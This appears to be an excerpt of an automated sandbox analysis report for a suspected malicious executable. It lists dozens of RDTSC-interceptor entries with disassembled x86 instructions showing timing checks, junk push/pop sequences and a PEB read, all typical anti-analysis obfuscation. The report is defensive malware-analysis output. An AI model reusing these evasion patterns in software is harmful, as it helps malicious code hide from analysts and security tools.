Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E06CFE second address: E06D02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E06F64 second address: E06F9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F6F951A9EC1h 0x0000000d popad 0x0000000e pushad 0x0000000f jmp 00007F6F951A9EC5h 0x00000014 jo 00007F6F951A9EB6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E06F9C second address: E06FB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6F946E7E3Ah 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E06FB7 second address: E06FE0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6F951A9EB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 jne 00007F6F951A9EB6h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F6F951A9EBEh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E06FE0 second address: E06FF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E42h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E0712B second address: E07136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E07136 second address: E0713A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E0713A second address: E07160 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jnl 00007F6F951A9EB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6F951A9EC8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E07160 second address: E07164 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E07164 second address: E071B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6F951A9EC9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F6F951A9EC7h 0x00000015 jmp 00007F6F951A9EC5h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E071B9 second address: E071BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E0732B second address: E0732F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E07461 second address: E0746D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F6F946E7E36h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E0746D second address: E07479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E0D258 second address: E0D25F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E0D25F second address: E0D287 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC8h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6F951A9EBAh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E0D287 second address: E0D28B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E0FD9D second address: E0FDA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E0FEA8 second address: E0FEAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E0FEAE second address: E0FEB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E0FEB2 second address: E0FEB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E0FEB6 second address: E0FEC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E0FEC3 second address: E0FEF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jne 00007F6F946E7E3Ch 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007F6F946E7E43h 0x00000015 mov eax, dword ptr [eax] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E0FEF6 second address: E0FF2A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d jmp 00007F6F951A9EC5h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F6F951A9EC0h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E1012E second address: E10132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E10132 second address: E10145 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EBFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E10145 second address: E10189 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jg 00007F6F946E7E36h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F6F946E7E49h 0x00000014 nop 0x00000015 mov dword ptr [ebp+12456353h], edi 0x0000001b push dword ptr [ebp+122D26A8h] 0x00000021 push C78B3020h 0x00000026 push eax 0x00000027 push edx 0x00000028 jnp 00007F6F946E7E3Ch 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E10189 second address: E1018D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E1018D second address: E10192 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E10192 second address: E10198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120062 second address: 712013A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6F946E7E47h 0x00000009 xor esi, 3FD1616Eh 0x0000000f jmp 00007F6F946E7E49h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 pushad 0x0000001a mov bh, 2Eh 0x0000001c pushfd 0x0000001d jmp 00007F6F946E7E44h 0x00000022 and al, 00000018h 0x00000025 jmp 00007F6F946E7E3Bh 0x0000002a popfd 0x0000002b popad 0x0000002c xchg eax, ebp 0x0000002d pushad 0x0000002e mov edx, esi 0x00000030 pushfd 0x00000031 jmp 00007F6F946E7E40h 0x00000036 or eax, 3E5E8278h 0x0000003c jmp 00007F6F946E7E3Bh 0x00000041 popfd 0x00000042 popad 0x00000043 mov ebp, esp 0x00000045 pushad 0x00000046 mov dh, cl 0x00000048 pushfd 0x00000049 jmp 00007F6F946E7E41h 0x0000004e jmp 00007F6F946E7E3Bh 0x00000053 popfd 0x00000054 popad 0x00000055 mov eax, dword ptr fs:[00000030h] 0x0000005b jmp 00007F6F946E7E46h 0x00000060 sub esp, 18h 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 mov bx, ax 0x00000069 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 712013A second address: 7120157 instructions: 0x00000000 rdtsc 0x00000002 mov cx, 096Fh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F6F951A9EBBh 0x0000000e pop esi 0x0000000f popad 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120157 second address: 712015B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 712015B second address: 712015F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 712015F second address: 7120165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120165 second address: 71201A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov al, EDh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], ebx 0x0000000d jmp 00007F6F951A9EC7h 0x00000012 mov ebx, dword ptr [eax+10h] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F6F951A9EC5h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71201A3 second address: 71201B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F946E7E3Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71201B3 second address: 71201E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007F6F951A9EBCh 0x0000000e mov dword ptr [esp], esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F6F951A9EC7h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71201E4 second address: 71201EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71201EA second address: 7120200 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [770206ECh] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 pop ebx 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120200 second address: 7120212 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F946E7E3Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120212 second address: 71202A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d pushad 0x0000000e call 00007F6F951A9EC4h 0x00000013 mov ebx, eax 0x00000015 pop eax 0x00000016 call 00007F6F951A9EC7h 0x0000001b push eax 0x0000001c pop edi 0x0000001d pop ecx 0x0000001e popad 0x0000001f jne 00007F6F951AADB2h 0x00000025 pushad 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F6F951A9EC7h 0x0000002d and eax, 640F47FEh 0x00000033 jmp 00007F6F951A9EC9h 0x00000038 popfd 0x00000039 pushad 0x0000003a popad 0x0000003b popad 0x0000003c movzx ecx, dx 0x0000003f popad 0x00000040 push esp 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71202A6 second address: 71202AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71202AA second address: 71202AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71202AE second address: 71202B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71202B4 second address: 7120327 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6F951A9EC8h 0x00000009 sub al, 00000058h 0x0000000c jmp 00007F6F951A9EBBh 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F6F951A9EC8h 0x00000018 xor esi, 2BF683B8h 0x0000001e jmp 00007F6F951A9EBBh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 mov dword ptr [esp], edi 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F6F951A9EC5h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120327 second address: 712035D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F6F946E7E3Dh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d call dword ptr [76FF0B60h] 0x00000013 mov eax, 7571E5E0h 0x00000018 ret 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c call 00007F6F946E7E43h 0x00000021 pop esi 0x00000022 mov cx, di 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 712035D second address: 712036F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 mov ebx, esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push 00000044h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 712036F second address: 7120373 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120373 second address: 712038E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120422 second address: 7120426 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120426 second address: 712042C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 712042C second address: 7120467 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov esi, eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F6F946E7E48h 0x00000015 and esi, 327AB048h 0x0000001b jmp 00007F6F946E7E3Bh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120467 second address: 71204CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F6F951A9EC3h 0x00000011 adc cl, 0000003Eh 0x00000014 jmp 00007F6F951A9EC9h 0x00000019 popfd 0x0000001a mov dx, ax 0x0000001d popad 0x0000001e je 00007F70050290B7h 0x00000024 pushad 0x00000025 mov edi, eax 0x00000027 movzx eax, dx 0x0000002a popad 0x0000002b mov eax, 00000000h 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F6F951A9EC3h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71204CE second address: 7120509 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi], edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6F946E7E48h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120509 second address: 712050D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 712050D second address: 7120513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120513 second address: 712054A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F6F951A9EBCh 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esi+04h], eax 0x0000000f jmp 00007F6F951A9EBCh 0x00000014 mov dword ptr [esi+08h], eax 0x00000017 pushad 0x00000018 mov di, si 0x0000001b push eax 0x0000001c mov bh, 8Ch 0x0000001e pop esi 0x0000001f popad 0x00000020 mov dword ptr [esi+0Ch], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 712054A second address: 712054E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 712054E second address: 7120568 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120568 second address: 7120583 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+4Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edx 0x00000010 pop esi 0x00000011 movsx edi, si 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120583 second address: 71205EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+10h], eax 0x0000000c pushad 0x0000000d mov bx, ax 0x00000010 pushfd 0x00000011 jmp 00007F6F951A9EC8h 0x00000016 xor cl, 00000008h 0x00000019 jmp 00007F6F951A9EBBh 0x0000001e popfd 0x0000001f popad 0x00000020 mov eax, dword ptr [ebx+50h] 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F6F951A9EC5h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71205EA second address: 712063B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+14h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F6F946E7E43h 0x00000015 add si, DE5Eh 0x0000001a jmp 00007F6F946E7E49h 0x0000001f popfd 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 712063B second address: 712068C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+54h] 0x0000000c pushad 0x0000000d jmp 00007F6F951A9EC4h 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 call 00007F6F951A9EBEh 0x0000001a pop eax 0x0000001b popad 0x0000001c popad 0x0000001d mov dword ptr [esi+18h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push ecx 0x00000024 pop ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 712068C second address: 7120691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120691 second address: 71206E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+58h] 0x0000000c jmp 00007F6F951A9EBEh 0x00000011 mov dword ptr [esi+1Ch], eax 0x00000014 jmp 00007F6F951A9EC0h 0x00000019 mov eax, dword ptr [ebx+5Ch] 0x0000001c pushad 0x0000001d mov si, 36FDh 0x00000021 mov cx, 45F9h 0x00000025 popad 0x00000026 mov dword ptr [esi+20h], eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71206E4 second address: 71206E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71206E8 second address: 71206EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71206EC second address: 71206F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71206F2 second address: 712073B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 2439D2A1h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+60h] 0x0000000e jmp 00007F6F951A9EBCh 0x00000013 mov dword ptr [esi+24h], eax 0x00000016 jmp 00007F6F951A9EC0h 0x0000001b mov eax, dword ptr [ebx+64h] 0x0000001e jmp 00007F6F951A9EC0h 0x00000023 mov dword ptr [esi+28h], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushad 0x0000002a popad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 712073B second address: 712076A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 push eax 0x00000007 pop edi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+68h] 0x0000000e jmp 00007F6F946E7E48h 0x00000013 mov dword ptr [esi+2Ch], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 712076A second address: 712076E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 712076E second address: 7120774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120774 second address: 7120783 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F951A9EBBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120783 second address: 71207B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ax, word ptr [ebx+6Ch] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6F946E7E3Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71207B5 second address: 71207BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
